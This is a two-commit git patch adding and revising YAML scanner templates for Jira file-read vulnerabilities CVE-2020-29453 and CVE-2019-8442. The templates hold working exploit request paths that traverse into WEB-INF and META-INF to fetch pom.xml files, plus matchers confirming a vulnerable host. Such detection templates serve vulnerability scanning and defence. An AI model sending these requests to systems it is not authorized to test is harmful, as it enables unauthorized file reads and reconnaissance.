From be3d5c9d084f4cf9d734f73b8b54df437e08c5fd Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 23 Aug 2021 11:30:16 +0700 Subject: [PATCH 1/2] Add CVE-2020-29453 --- cves/2020/CVE-2020-29453.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2020/CVE-2020-29453.yaml diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml new file mode 100644 index 0000000000..d1f0f8ec5a --- /dev/null +++ b/cves/2020/CVE-2020-29453.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-29453 + +info: + name: Pre-Auth Limited Arbitrary File Read in Jira Server + author: dwisiswant0 + severity: medium + description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. + reference: https://jira.atlassian.com/browse/JRASERVER-72014 + tags: cve,cve2020,atlassian,jira,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - com.atlassian.jira + part: body \ No newline at end of file From 451e938d460aa187b6a479db4cf1885a66403e02 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 23 Aug 2021 14:54:04 +0530 Subject: [PATCH 2/2] misc changes --- cves/2019/CVE-2019-8442.yaml | 15 ++++++--------- cves/2020/CVE-2020-29453.yaml | 4 +++- 2 files changed, 9 insertions(+), 10 deletions(-) diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml index c1400479b9..74622a2fa8 100644 --- a/cves/2019/CVE-2019-8442.yaml +++ b/cves/2019/CVE-2019-8442.yaml @@ -8,21 +8,18 @@ info: tags: cve,cve2019,atlassian,jira,lfi requests: - - raw: - - | - GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: deflate + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - com.atlassian.jira + - 'com.atlassian.jira' part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index d1f0f8ec5a..3e39b3447e 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -13,12 +13,14 @@ requests: path: - "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" - "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - com.atlassian.jira + - 'com.atlassian.jira' part: body \ No newline at end of file